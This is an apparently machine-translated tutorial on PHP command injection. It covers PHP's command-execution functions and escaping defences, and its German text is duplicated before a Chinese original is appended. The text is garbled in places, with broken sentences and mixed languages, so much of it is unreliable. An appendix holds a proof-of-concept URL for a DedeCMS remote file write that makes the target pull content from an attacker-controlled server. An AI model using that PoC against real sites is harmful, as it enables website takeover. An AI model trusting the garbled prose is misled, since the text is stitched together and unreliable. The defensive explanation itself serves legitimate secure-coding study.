Die Schwachstelle bei PHP-Befehlsinjektionsangriffen ist eine der häufigsten Skriptschwachstellen in PHP-Anwendungen wie Discuz!
Command Injection, also ein Command-Injection-Angriff, bezieht sich auf die Tatsache, dass Webanwendungen die von Benutzern übermittelten Daten nicht streng filtern und Hacker spezielle Befehlszeichenfolgen erstellen können. Übermitteln Sie Daten an eine Webanwendung und verwenden Sie diese Methode, um externe Programme oder Systembefehle auszuführen, um Angriffe durchzuführen, illegal Daten oder Netzwerkressourcen abzurufen usw.
Der Hauptgrund für PHP-Befehlsinjektionsangriffe besteht darin, dass, wenn Webanwendungsprogrammierer einige Funktionen mit Befehlsausführungsfunktionen in der PHP-Sprache verwenden, der vom Benutzer übermittelte Dateninhalt ohne strenge Filterung in die Funktion übertragen wird. Wenn der von einem Hacker übermittelte Dateninhalt beispielsweise darin besteht, eine PHP-Datei in das Website-Verzeichnis zu schreiben, kann der Befehl verwendet werden, um die Angriffslücke in eine PHP-Backdoor-Datei einzuschleusen und dann weitere Penetrationsangriffe durchzuführen.
Die Sicherheitslücke bei einem PHP-Command-Injection-Angriff bringt ernsthaften Schaden und Auswirkungen mit sich. Die folgenden Methoden können verwendet werden, um Schwachstellen bei Command-Injection-Angriffen zu verhindern:
1. Versuchen Sie, keine externen Anwendungen oder Befehle auszuführen.
2. Verwenden Sie benutzerdefinierte Funktionen oder Funktionsbibliotheken, um die Funktionen externer Anwendungen oder Befehle zu implementieren.
3. Bestimmen Sie den Parameterinhalt, bevor Sie Funktionen wie System und Eval ausführen.
4. Verwenden Sie die Escapeshellarg-Funktion, um relevante Parameter zu verarbeiten. Die Escapeshellarg-Funktion maskiert alle Zeichen, die das Ende von Parametern oder Befehlen verursachen. Beispielsweise wird das einfache Anführungszeichen „'“ als „‘“ maskiert, das doppelte Anführungszeichen „“ wird als „““ maskiert und das Semikolon „;“ wird als „;“ maskiert, sodass escapeshellarg den Parameterinhalt auf ein Paar einfache oder doppelte Anführungszeichen beschränkt und die in den Parametern enthaltenen einfachen Anführungszeichen oder doppelten Anführungszeichen maskiert, sodass die aktuelle Ausführung nicht abgeschnitten werden kann Prävention Der Zweck von Command-Injection-Angriffen.
5. Verwenden Sie „safe_mode_exec_dir“, um den Pfad der ausführbaren Datei auszuführen. Setzen Sie „safe_mode“ in der Datei „php.ini“ auf „Ein“, legen Sie dann die ausführbare Datei in ein Verzeichnis ab und verwenden Sie „safe_mode_exec_dir“, um den Pfad der ausführbaren Datei anzugeben. Wenn das entsprechende externe Programm ausgeführt werden muss, muss sich das Programm auf diese Weise in dem durch „safe_mode_exec_dir“ angegebenen Verzeichnis befinden, bevor die Ausführung zulässig ist, andernfalls schlägt die Ausführung fehl.
Die Schwachstelle bei PHP-Befehlsinjektionsangriffen ist eine der häufigsten Schwachstellen in PHP-Anwendungen. Es wurde berichtet, dass berühmte inländische PHP-Anwendungen wie Discuz!, Dedecms und andere große Programme Sicherheitslücken bei Befehlsinjektionsangriffen im Internet aufweisen. Hacker können durch Sicherheitslücken bei Befehlsinjektionsangriffen schnell Website-Berechtigungen erhalten und dann böswillige Angriffe ausführen B. Pferdewerbung und Phishing. Die Auswirkungen und der verursachte Schaden sind enorm. Gleichzeitig wird die PHP-Sprache derzeit in einem großen Teil der Webanwendungsentwicklung verwendet. Programmierer von Webanwendungen sollten die Gefahren von Schwachstellen bei Befehlsinjektionsangriffen verstehen, die Schwachstellen beheben, die von Hackern im Programm ausgenutzt werden können, und die Sicherheit von Programmen schützen Netzwerkbenutzer. Angegriffen durch Schadcodes wie Trojaner und Phishing
In PHP können Sie externe Programme ausführen oder Funktionen Die Befehlsausführungsfunktion umfasst die folgenden 5 Funktionen.
kann verwendet werden, um eine externe Anwendung auszuführen und die entsprechenden Ausführungsergebnisse auszugeben. Der Funktionsprototyp lautet wie folgt: String-System (String-Befehl, int &return_var) Unter diesen ist command der auszuführende Befehl, und return_var speichert den Statuswert nach der Ausführung des Befehls. Nach den Vorstellungen von PHP-Programmierern besteht die Hauptfunktion der Befehlsausführungsfunktion darin, über die Befehlsausführungsfunktion mit der Webanwendung zu interagieren und externe Programme oder Systembefehle über die Webanwendung auszuführen B. die IP-Adresse über die Systemfunktion und andere Informationen, dann kann er dies erreichen, indem er den folgenden Code erstellt. Im folgenden Code wird eine Variable namens $action definiert, deren Wert der erhaltene cmd-Wert system($action)); ist, wobei $action der Parameter von system ist, also der auszuführende Befehl. Wenn wir PHP debuggen und var_dump oder print_r zum Drucken von Daten oder Arrays verwenden, werden auf der HTML-Seite keine Zeilenumbrüche angezeigt und es ist schwierig, sie vor der Ausgabe zu finden, um sie automatisch zu formatieren Zeilenumbrüche zur Anzeige.
Geben Sie „http://localhost/test.php?cmd=ipconfig“ in die Adressleiste des Browsers ein. Wenn der Wert von cmd ipconfig zugewiesen wird, gibt die Systemfunktion die IP-Adressinformationen aus =
kann zum Ausführen einer externen Anwendung verwendet werden. Der Funktionsprototyp lautet wie folgt:
string exec ( string $command [, array &$output [, int &$return_var ]] ),
Wobei „command“ der auszuführende Befehl ist, „output“ die Zeichenfolge für jede Ausgabezeile des ausgeführten Befehls ist und „return_var“ den Statuswert nach der Ausführung des Befehls speichert.
kann verwendet werden, um einen Systembefehl auszuführen und die Originalausgabe anzuzeigen, wenn die Ausgabe des Systems erfolgt Der Befehl ist binär. Wenn die Daten direkt an den Browser zurückgegeben werden müssen, muss die Passthru-Funktion verwendet werden, um die System- und Exec-Funktionen zu ersetzen. Der Prototyp der Passthru-Funktion lautet wie folgt:
void passthru (string command, int &return_var),
wobei command der auszuführende Befehl ist und return_var den Statuswert nach der Ausführung des Befehls speichert. Sie können es testen, indem Sie den folgenden PHP-Code erstellen.
führt den Shell-Befehl aus und gibt den Funktionsprototyp wie folgt zurück:
string shell_exec (string command),
Befehl
ist der auszuführende Befehl.
haben die gleiche Funktion wie shell_exec, führen den Shell-Befehl aus und geben die Ausgabezeichenfolge zurück.
Die Funktion popen() öffnet den Prozessdateizeiger, das heißt, sie öffnet eine Pipe, die auf den Prozess zeigt, der von ausgeführt wird Abgeleiteter Befehl Befehl. Gibt einen Dateizeiger zurück, der jedoch nur zum Lesen oder Schreiben verwendet werden kann und mit pclose() geschlossen werden muss. Wenn ein Fehler auftritt, lautet der Funktionsprototyp wie folgt: popen( string $command, string. $mode), wobei command den auszuführenden Befehl angibt, mode den Verbindungsmodus angibt, r schreibgeschützt ist und w schreibgeschützt ist 2.7 proc_open-Funktion
2.8pcntl_exec-Funktion
Wenn die vom Benutzer eingegebenen Daten verwendet werden Als Funktionsparameter können Sie die Funktion escapeshellarg() oder escapeshellcmd() verwenden, um die vom Benutzer eingegebenen Daten zu filtern, um zu verhindern, dass das System beliebige Befehle ausführt >
entfernt spezielle Symbole in der Zeichenfolge und maskiert alle Zeichen in den Befehls-Shell-Metazeichen, um die Aufgabe zu erledigen. Zu diesen Metazeichen gehören: # & ;``,| * ? ~ < Der Funktionsprototyp lautet wie folgt: string escapeshellcmd(string command). Diese Funktion entfernt spezielle Symbole in der Zeichenfolge, um zu verhindern, dass Benutzer das Serversystem böswillig knacken.
Diese Funktion wandelt eine Zeichenfolge in Parameter um, die in Shell-Befehlen verwendet werden können. escapeshellarg() fügt der Zeichenfolge ein einfaches Anführungszeichen hinzu und kann alle vorhandenen einfachen Anführungszeichen in Anführungszeichen setzen oder maskieren, wodurch sichergestellt wird, dass eine Zeichenfolge direkt an die Shell-Funktion übergeben werden kann und dennoch sicher ist. Diese Funktion sollte für einige vom Benutzer eingegebene Parameter verwendet werden. Es kann in der PHP-Sicherheit verwendet werden, wodurch einige in arg vorhandene Sonderzeichen herausgefiltert werden. Wenn die Eingabeparameter chinesische Zeichen enthalten und an escapeshellarg übergeben werden, werden diese herausgefiltert. Der Funktionsprototyp lautet wie folgt: string escapeshellarg (string $arg), wobei arg der Parameter ist, der maskiert werden muss.
Anhang: Link zur Schwachstelle beim Schreiben von dedecms-Remotedateien (nicht im Zusammenhang mit den Wissenspunkten dieses Artikels)
https://www.seebug.org/vuldb/ssvid-89354
poc:
http://target IP/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://http://http-Server, der von Ihnen selbst gesteuert wird/
Die Schwachstelle bei PHP-Befehlsinjektionsangriffen ist eine der häufigsten Skriptschwachstellen in PHP-Anwendungen. Berühmte inländische Webanwendungen wie Discuz und DedeCMS weisen alle diese Art von Schwachstelle auf.
Befehlsinjektion, also ein Befehlsinjektionsangriff, bezieht sich auf die Tatsache, dass die Webanwendung die vom Benutzer übermittelten Daten nicht streng filtert, sodass der Hacker die Daten durch Erstellen einer speziellen Befehlszeichenfolge an die Webanwendung übermitteln kann , und verwenden Sie die Methode, um externe Programme oder Systembefehle auszuführen, um Angriffe durchzuführen, illegal Daten oder Netzwerkressourcen abzurufen usw.
Der Hauptgrund für PHP-Befehlsinjektionsangriffe besteht darin, dass, wenn Webanwendungsprogrammierer einige Funktionen mit Befehlsausführungsfunktionen in der PHP-Sprache verwenden, der vom Benutzer übermittelte Dateninhalt ohne strenge Filterung in die Funktion übertragen wird. Wenn der von einem Hacker übermittelte Dateninhalt beispielsweise darin besteht, eine PHP-Datei in das Website-Verzeichnis zu schreiben, kann der Befehl verwendet werden, um die Angriffslücke in eine PHP-Backdoor-Datei einzuschleusen und dann weitere Penetrationsangriffe durchzuführen.
Die Sicherheitslücke bei einem PHP-Command-Injection-Angriff bringt ernsthaften Schaden und Auswirkungen mit sich. Die folgenden Methoden können verwendet werden, um Schwachstellen bei Command-Injection-Angriffen zu verhindern:
1. Versuchen Sie, keine externen Anwendungen oder Befehle auszuführen.
2. Verwenden Sie benutzerdefinierte Funktionen oder Funktionsbibliotheken, um die Funktionen externer Anwendungen oder Befehle zu implementieren.
3. Bestimmen Sie den Parameterinhalt, bevor Sie Funktionen wie System und Eval ausführen.
4. Verwenden Sie die Escapeshellarg-Funktion, um relevante Parameter zu verarbeiten. Die Escapeshellarg-Funktion maskiert alle Zeichen, die das Ende von Parametern oder Befehlen verursachen. Beispielsweise wird das einfache Anführungszeichen „'“ als „‘“ maskiert, das doppelte Anführungszeichen „“ wird als „““ maskiert und das Semikolon „;“ wird als „;“ maskiert, sodass escapeshellarg den Parameterinhalt auf ein Paar einfache oder doppelte Anführungszeichen beschränkt und die in den Parametern enthaltenen einfachen Anführungszeichen oder doppelten Anführungszeichen maskiert, sodass die aktuelle Ausführung nicht abgeschnitten werden kann Prävention Der Zweck von Command-Injection-Angriffen.
5. Verwenden Sie „safe_mode_exec_dir“, um den Pfad der ausführbaren Datei auszuführen. Setzen Sie „safe_mode“ in der Datei „php.ini“ auf „Ein“, legen Sie dann die ausführbare Datei in ein Verzeichnis ab und verwenden Sie „safe_mode_exec_dir“, um den Pfad der ausführbaren Datei anzugeben. Wenn das entsprechende externe Programm ausgeführt werden muss, muss sich das Programm auf diese Weise in dem durch „safe_mode_exec_dir“ angegebenen Verzeichnis befinden, bevor die Ausführung zulässig ist, andernfalls schlägt die Ausführung fehl.
Die Schwachstelle bei PHP-Befehlsinjektionsangriffen ist eine der häufigsten Schwachstellen in PHP-Anwendungen. Es wurde berichtet, dass berühmte inländische PHP-Anwendungen wie Discuz!, Dedecms und andere große Programme Sicherheitslücken bei Befehlsinjektionsangriffen im Internet aufweisen. Hacker können durch Sicherheitslücken bei Befehlsinjektionsangriffen schnell Website-Berechtigungen erhalten und dann böswillige Angriffe ausführen B. Pferdewerbung und Phishing. Die Auswirkungen und der verursachte Schaden sind enorm. Gleichzeitig wird die PHP-Sprache derzeit in einem großen Teil der Webanwendungsentwicklung verwendet. Programmierer von Webanwendungen sollten die Gefahren von Schwachstellen bei Befehlsinjektionsangriffen verstehen, die Schwachstellen beheben, die von Hackern im Programm ausgenutzt werden können, und die Sicherheit von Programmen schützen Netzwerkbenutzer. Angegriffen durch Schadcodes wie Trojaner und Phishing
In PHP können Sie externe Programme ausführen oder Funktionen Die Befehlsausführungsfunktion umfasst die folgenden 5 Funktionen.
可以用来执行一个外部的应用程序并将相应的执行结果输出,函数原型如下:string system(string command, int &return_var)其中,command是要执行的命令,return_var存放执行命令的执行后的状态值。按照PHP程序员的想法,命令执行函数的主要作用是可以通过命令执行函数与Web应用程序进行交互,通过Web应用程序执行外部程序或系统命令,如Web应用程序员想通过system函数获取IP地址、用户等信息,那么他可以通过构造如下代码实现。在下面的代码中,定义了一个名为$action的变量,其值为获得的cmd值,system($action));中$action为system的参数,即要执行的命令。当我们PHP调试的时候,用var_dump 或 print_r打印数据或数组时,html页面没有换行显示,看到的内容一大堆,不好定位,输出前添加 ,便可以自动格式化换行显示。
在浏览器地址栏输入”http://localhost/test.php?cmd=ipconfig”,当cmd的值赋值为ipconfig时,system函数输出IP地址信息=
可以用来执行一个外部的应用程序,函数原型如下:
string exec ( string $command [, array &$output [, int &$return_var ]] ),
其中command是要执行的命令,output是获得执行命令输出的每一行字符串,return_var存放执行命令后的状态值。
可以用来执行一个系统命令并显示原始的输出,当系统命令的输出是二进制的数据,并且需要直接返回值给浏览器时,需要使用passthru函数来替代system与exec函数。Passthru函数原型如下:
void passthru (string command, int &return_var),
其中command是要执行的命令,return_var存放执行命令后的状态值。可以通过构造如下PHP代码进行测试。
执行shell命令并返回输出的字符串,函数原型如下:
string shell_exec (string command),command是要执行的命令。
与shell_exec功能相同,执行shell命令并返回输出的字符串。
popen() 函数打开进程文件指针,即打开一个指向进程的管道,该进程由派生指定的 command 命令执行而产生。返回一个文件指针,只不过它是单向的(只能用于读或写)并且必须用pclose()来关闭。若出错,则返回 false。函数原型如下:popen(string $command,string $mode),其中,command为规定要执行的命令,mode规定连接模式,r为只读,w为只写。
用于执行一个命令,并且打开用来输入/输出的文件指针。与popen()函数类似,但是 proc_open()提供了更加强大的控制程序执行的能力。函数原型如下:
resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] )
pcntl_exec函数在当前进程空间执行指定程序。当发生错误时返回 FALSE,没有错误时没有返回。函数原型如下:void pcntl_exec ( string $path [, array $args [, array $envs ]] )其中,path必须是可执行二进制文件路径或一个在文件第一行指定了一个可执行文件路径标头的脚本;args是一个要传递给程序的参数的字符串数组;envs是一个要传递给程序作为环境变量的字符串数组。这个数组是 key => value格式的,key代表要传递的环境变量的名称,value代表该环境变量值。
当用户输入的数据作为函数参数时,可以使用escapeshellarg()或escapeshellcmd()函数来过滤用户输入的数据,防止用户欺骗系统执行任意命令。
除去字符串中的特殊符号,会转义命令中的所有shell元字符来完成工作。这些元字符包括:# & ;``,| * ? ~ < > ^ ( ) [ ] { } $ \\。函数原型如下:string escapeshellcmd(string command)。本函数除去了字符串中的特殊符号,可以防止使用者恶意破解服务器系统。
该函数把字符串转码为可以在shell命令里使用的参数。escapeshellarg()将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。可以用到php的安全中,会过滤掉arg中存在的一些特殊字符。在输入的参数中如果包含中文传递给escapeshellarg,会被过滤掉。函数原型如下:
string escapeshellarg ( string $arg )
,其中arg为需要被转码的参数。
Das obige ist der detaillierte Inhalt vonPHP-Befehlsinjektion dedecms Remote-Schreiben von Datei-Link-Beispielfreigabe. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!